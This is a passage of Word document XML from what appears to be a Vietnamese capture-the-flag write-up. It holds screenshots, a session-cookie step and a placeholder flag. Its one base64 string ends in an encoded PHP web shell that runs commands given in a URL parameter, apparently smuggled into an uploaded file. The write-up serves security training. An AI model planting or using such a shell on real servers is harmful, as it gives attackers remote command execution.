          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0THdAsXm7sRpPZoGmK/5XC/KtQcSRn6rQARYPrj7f4lVrTQGCfSzAoPkiIMl8UFaCFEl6PfNyZ/ZHb1ygDc8W9iCPjFWNI9brm2s1DbJGcbdU+I0h9oD/QI5YwbSSM2g6Z8zQg9XfujOVLZwgCgNHsaYIby2qIOTlvllq2/3KnA9PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4K</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A181F4" w14:textId="77777777" w:rsidR="00FD5433" w:rsidRDefault="00FD5433" w:rsidP="00F70C76">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08BE934F" w14:textId="60C367DB" w:rsidR="00FD5433" w:rsidRDefault="00FD5433" w:rsidP="00F70C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Xóa PHPSESSID cũ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1008566D" w14:textId="2F17B1C1" w:rsidR="00C10C19" w:rsidRDefault="00C10C19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B0AF582" wp14:editId="367AD04A">
            <wp:extent cx="6046683" cy="212974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46" b="57309"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6101207" cy="2148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F5D49" w14:textId="1D9AAB90" w:rsidR="00C10C19" w:rsidRDefault="00C10C19" w:rsidP="00F70C76">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51B47878" w14:textId="77777777" w:rsidR="00C10C19" w:rsidRDefault="00C10C19" w:rsidP="00F70C76">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30E7C5B8" w14:textId="77777777" w:rsidR="000C6FDB" w:rsidRDefault="000C6FDB" w:rsidP="00F70C76">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B985837" w14:textId="71D89F8D" w:rsidR="000C6FDB" w:rsidRDefault="00732BA8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5BC4C8" wp14:editId="7B564209">
            <wp:extent cx="4548851" cy="4326268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9439" cy="43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CBED" w14:textId="7535058E" w:rsidR="00732BA8" w:rsidRDefault="00732BA8" w:rsidP="00F70C76">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E231D36" w14:textId="77777777" w:rsidR="00732BA8" w:rsidRDefault="00732BA8" w:rsidP="00F70C76">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C6CABF9" w14:textId="3C76289E" w:rsidR="000C6FDB" w:rsidRDefault="00732BA8" w:rsidP="00F70C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6BA2E02" wp14:editId="17DAB59E">
            <wp:extent cx="5081286" cy="2892967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621" cy="28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1469" w14:textId="7078BFE8" w:rsidR="00732BA8" w:rsidRDefault="00732BA8" w:rsidP="00F70C76">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63671739" w14:textId="466EDB8F" w:rsidR="00732BA8" w:rsidRPr="00732BA8" w:rsidRDefault="00732BA8" w:rsidP="00F70C76">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00732BA8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Flag: </w:t>
      </w:r>
      <w:r w:rsidRPr="00732BA8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CHH{ThiS_i5_Y0ur_FaKE_fLaG}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E9DB96" w14:textId="1799CCC8" w:rsidR="00732BA8" w:rsidRDefault="00732BA8" w:rsidP="00F70C76">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0251CC7B" w14:textId="77777777" w:rsidR="00732BA8" w:rsidRDefault="00732BA8" w:rsidP="00F70C76">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18102B2E" w14:textId="77777777" w:rsidR="00F70C76" w:rsidRDefault="00F70C76" w:rsidP="00F70C76">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="457CFF98" w14:textId="77777777" w:rsidR="002F49FE" w:rsidRDefault="002F49FE"/>
    <w:sectPr w:rsidR="002F49F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EB2F53"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7F7C4D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217D031D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4FC80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0724BF3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D0BAEB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25F1"/>
    <w:rsid w:val="00030C9B"/>
    <w:rsid w:val="000C6FDB"/>
    <w:rsid w:val="00172A5B"/>
    <w:rsid w:val="002F49FE"/>
    <w:rsid w:val="00363CB1"/>
    <w:rsid w:val="00593684"/>
    <w:rsid w:val="005B4B18"/>
    <w:rsid w:val="0064221E"/>
    <w:rsid w:val="007035C1"/>
    <w:rsid w:val="00732BA8"/>
    <w:rsid w:val="00911274"/>
    <w:rsid w:val="00914F5D"/>
    <w:rsid w:val="009225F1"/>
    <w:rsid w:val="00BD107F"/>
    <w:rsid w:val="00C10C19"/>
    <w:rsid w:val="00C31D08"/>
    <w:rsid w:val="00C427BC"/>
    <w:rsid w:val="00E33F87"/>
    <w:rsid w:val="00E6786F"/>
    <w:rsid w:val="00F70C76"/>
    <w:rsid w:val="00FD5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ACEF3CA"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{706E79D5-AAE6-C34A-8E81-6845DBC3A7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70C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F70C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0867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6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6</Pages>
  <Words>314</Words>
  <Characters>1791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2024-01-06T14:55:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-01-06T16:18:00Z</dcterms:modified>
</cp:coreProperties>
</file>